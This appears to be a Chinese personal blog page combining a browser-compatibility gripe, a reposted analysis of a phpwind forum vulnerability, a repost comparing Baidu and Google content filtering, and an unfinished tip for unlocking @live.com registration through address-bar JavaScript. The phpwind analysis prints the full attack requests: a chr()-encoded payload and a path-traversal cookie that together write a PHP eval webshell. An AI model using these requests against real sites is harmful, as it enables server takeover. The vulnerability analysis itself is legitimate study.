无可赖何_{阿肆的个人博客}

唉~
也太无聊了

因为做的时候是在firefox2下测试的，做好之后，在opera，safari上表现也还可以，但是放到ie7下就错位严重了，ie6下没有环境测试，所以在css里加了ie的css hack，通过验证的是没有加css hack的css。
唉~ie啊

PW又出漏洞了：
案列：
http://www.phpwind.net/read-htm-tid-391918.html

http://www.phpwind.net/read-htm-tid-391955.html

http://www.phpwind.net/read-htm-tid-391918.html

同时转篇文章：分析phpwind漏洞

怎么说呢，这个漏洞是pinkeyes发现的，本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的，我还在冒虚汗中，同时pinkeyes 的睿智深深的打动了我，原来我才明白什么才是真正的技术含量。且听我慢慢道来：
在程序运行时，我抓了一个包：

GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=< ?fputs(fopen
(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),
chr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).
chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1
Content-Type: text/html
Cookie:skinco=../../require/hidden;
Host: www.5a609.com:81
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

GET /phpwind//attachment/set.php HTTP/1.1
Content-Type: text/html
Cookie:skinco=../../require/hidden;
Host: www.5a609.com:81
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)

Chr()里的那些东西我查了一下ascii字符表，得到的是这样的：
< ?fputs(fopen(./error.php,w)?>
很显然是在error.php里写入一行php木马：< ? eval($_post[cmd]);?> 。
所以关键是：
GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=中$D_name和$tidwt的出处。这两个东西很重要！于是我下了一个phpwind 的程序看看，开始以为是job.php有问题。进入job.php中，只发现如下代码：

elseif($previewjob=='preview'){
require_once(R_P.'require/bbscode.php');
require_once(R_P.'header.php');
if (empty($skin)) $skin=$db_defaultstyle;
if (file_exists(R_P."data/style/$skin.php")){
include_once("data/style/$skin.php");
}
好，在失望的同时也发现了$skin一定有问题，job.php文件头有个：require_once("./global.php");
接着我们来看看global.php里面的$skin参数吧：

if ($db_refreshtime!=0){
if('C:'.$REQUEST_URI==$lastpath && $onbbstime< $db_refreshtime){
!$_COOKIE['winduid'] && $groupid='guest';
$skin=$skinco ? $skinco : $db_defaultstyle;
Showmsg("refresh_limit");
}
哦，只要我们定义了$skinco就可以满足$skin了！所以再找找$skinco吧，$skinco只有一处解释，其后，并没有做任何过滤：
if($skinco && file_exists(R_P."data/style/$skinco.php")){
Cookie('skinco',$skinco);
哈哈，好轻松，只要存在就可以？这样只要构造一个cookie就完全可以实现。咦？$skinco我们好象哪里见过。果然，就是上面抓的包里面的：
Cookie:skinco=../../require/hidden;
这样就更加证明我的思路是正确的，风回路转呀。又不得不佩服这样精彩的手法，按照pinkeyes的思路：构造后应该是这样的：
data/style/../../require/hidden.php
也就是./require/hidden.php。
这样也就是满足了job.php中的

if (file_exists(R_P."data/style/$skin.php")){
include_once("data/style/$skin.php");
到这里，先告一段落，我们回个头想想。我们分析这么多就是pinkeyes要为了包含一个文件：./require/hidden.php。这就奇怪了，为什么这么pinkeyes要千方百计的来包含 ./require/hidden.php呢？直接利用不可以吗？这个hidden.php到底是个什么样的文件呢？恩，下面的解释会让你有一个满意的答案。
我小心翼翼的打开hidden.php

!function_exists('readover') && exit('Forbidden');
$newonline="<>\t$timestamp\t$onlineip\t$fidwt\t$tidwt\t$groupid\t$wherebbsyou\t$acttime\t$uid\t$windid\t";
$newonline=str_pad($newonline,$db_olsize)."\n";
$onlineuser=readover(R_P.$D_name);
if($offset=strpos($onlineuser,"\t".$windid."\t")){
$inselectfile='N';
$offset=strpos($onlineuser,"\n",$offset-$db_olsize);$offset+=1;/*会员名不在开始需要转换指针*/
writeinline(R_P.$D_name,$newonline,$offset);
}elseif($offset=strpos($onlineuser,str_pad(' ',$db_olsize)."\n")){
writeinline(R_P.$D_name,$newonline,$offset);
}else{
writeover(R_P.$D_name,$newonline,"ab");
}
?>

看到这里，所有的疑团都解开了！
1．原来文件头多了个
!function_exists('readover') && exit('Forbidden');
这样直接访问是不允许的，后面的代码也不会执行，这样我明白pinkeyes的苦心多走弯路来努力用include来包含这个文件
2 这个文件里有writeline()是可以写入木马的。$newonline正好也定义了$tidwt，所以最后的writeline()把$tidwt也写进去了。
写入到了d_name 所定义的set.php这个临时文件里。本来这样就可以写入一个小木马了，只要使$tidwt为编码：< ? eval($_post[cmd]);?>就可以的。但是可能是pinkeyes考虑到set.php里的东西比较乱。所以煞费苦心的用
< ?fputs(fopen(./error.php,w)?>
写入一个更简单的木马到error.php里！这样才多了我们抓的第二个包：
GET /phpwind//attachment/set.php HTTP/1.1
。。。。。。。。。

今天从keso的博客上走到了一家叫做月光博客的博客站上，期间有这样一篇文章：百度和Google谁更能搜索色情信息

本文主要针对百度和Google搜索引擎的关键字过滤功能进行比较和分析。

最近部分国内媒体刊登了一系列文章，包括“Google可搜大量色情链接 过滤可能损失流量”，“Google搜索不良条目量攀升 社会责任遭考验”，以大量篇幅论证Google包含色情违法信息，甚至有一种倾向，即将色情、违法信息泛滥的罪责推向了Google，似乎封杀了Google或搞定了Google关键词过滤，网络世界从此就会如同真空一样纯净。

虽然Google推出了专门针对中国国情的“谷歌”（Google.cn），并使用了颇受争议的信息过滤技术，然而即使如此依旧无法摆脱被恶意攻击和诽谤的命运。

该文章攻击道：“最常用的信息过滤、屏蔽技术被称为‘关键字过滤’，这项技术为广大搜索引擎企业所掌握”。并声称“这项‘信息过滤’技术不算是特别复杂的技术”。

据我所知，Google.cn（以后简称Google）和百度目前都对色情违法信息进行了过滤技术，不同的是，百度还增加了一项关键词屏蔽技术，就是对于一批敏感关键词，当服务器接收到用户提交的搜索词后，先将搜索词和上述“过滤词汇表”进行匹配对比；一旦匹配成功，服务器即返回“您输入的关键词可能涉及不符合相关法律法规的内容”，然后结束搜索。比如在百度搜索“色情”(我刚才在百度搜索这个关键词没有发现与其他词语有任何不同的搜索结果——阿肆)等词语后显示的效果。

然而，从技术上讲，这种“过滤词汇表”实际上有很大缺陷和漏洞，对于稍懂一点电脑知识的人来说形同虚设，例如在百度搜索“色情”（现在已经可以用了么？我刚才搜索了下，可以用。——阿肆）的确不让搜索，但是搜索“"色情"”（带引号的色情）即可返回18,300,000万条搜索记录，远远多于Google搜索出的记录（另外提一下，我用Google搜索“色情”返回的结果是“该页无法显示”，不知道这个记者用什么线路上网的，莫非是百度提供的专线？）。推而广之，所有百度通过“过滤词汇表”屏蔽的词汇，大部分只要加上个引号就全都可以搜索，另外，将多个屏蔽关键字组合在一起也可以搜索出结果，更可笑的是，在百度不可以搜索“色情”，但却可以搜索出“色情图片”70万条记录（现在是121万——阿肆），“色情电影”51万条记录（现在98万——阿肆），“色情小说”23万条记录（现在是152万——阿肆），“色情网站”79万条记录（现在是101万），可见这种屏蔽的方法实在是用来忽悠媒体的，实际作用非常有限。

其次，对于使用具体过滤技术来看，Google和百度都通过内容的相关性过滤掉色情违法网站，Google过滤是会在页面底部显示“据当地法律法规和政策，部分搜索结果未予显示”。两者的过滤效果来看，搜索几个关键字即可感觉出来。

百度搜索“色情图片”，第一页的大多数是论坛上的文章，并有4、5条包含色情信息，而在Google搜索“色情图片”，则第一页没有一篇是色情信息。搜索其他的信息进行对比也可以发现Google的确在信息过滤上做了不少工作，而百度则过滤的信息远不如Google，更进一步，用百度和Google搜索英文，我们发现百度对于英文网站的过滤效果更差，用百度搜索“hardcore”，结果出现了170万条数据（现在只有93万条——阿肆），可以打开查看到非常多的色情网站，而在Google中搜索“hardcore ”只能搜索到288条结果（现在是744项了，上升了，），这个夸张的对比可以看出两者在过滤功能上所做的工作实在差距太大，所以，如果百度在这方面对Google进行指责攻击，那实在是颠倒黑白，指鹿为马。

[color=Green]　　当然，这也反映出一个问题，就是Google和百度不同，Google根本不了解中国的国情，中国的国情就是人治，说明白点就是某些人凭自己的主观意志决定一切，你其实什么都不用做，但你其实什么都做了， 以前有个对联是“[color=Red]说你行，你就行，不行也行；说不行，就不行，行也不行 [color=Green]”， 横批是“不服不行”。[color=Orange]要深刻理解这种国情，必须知道这里谁说了算，谁能决定你企业的命运呢？当然是有权的人，只有他们才是主人，要想成功就需要积极向他们靠拢，争取进入他们的利益集团，形成共同利益，这才是在中国立于不败之地的方法。[color=Green]在中国做成功的企业要完全放弃自己的道德、良心和价值观，百度是“只说不做”，而Google是“只做不说”，Google还天真的以为配合中国进行信息过滤就可以顺利进入中国市场，其实百度在过滤上做的工作可能还不如Google的十分之一，但是百度却能让别人以为百度比Google做的多十倍。
当然，Google是个很值得敬佩的企业，在企业的价值观、道德观方面，Google坚持“你可以挣钱而不必做怀事”，在公司内部，每个人都努力成为“极具创新精神、值得信赖、行事正直，而且极大地改变了这个世界的人”。Google无论在管理领域还是在服务领域都顺应个人化、大众化、社会化的趋势，坚持“做正确的事情”。可能正是因为这一点，才使得目前Google在和百度的竞争中处于劣势。

原文地址：http://www.williamlong.info/archives/502.html
[color=Beige](p.s文章加彩部分为阿肆所加，括号内内容为阿肆根据现在的最新搜索结果说明)

上次的漏洞注册@live.com的邮箱没有赶上，注册的时候已经封了。今天在CNBETA上看见了最新漏洞，于是就抓紧时间注册了个@live.com的邮箱。
下面我把注册方法告诉大家
1. 进入 这个页面 开始注册.
http://get.live.com/getlive/overview
2. 点击注册按钮,进入下一个界面
3.复制如下代码到你的地址栏中,回车

javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="live.");r(a = new Array("hotmail.com","hotmail.co.uk","msn.com",d+"com",d+"be",d+"co.uk",d+"de",d+"fr",d+"it",d+"nl")); for (i=0;i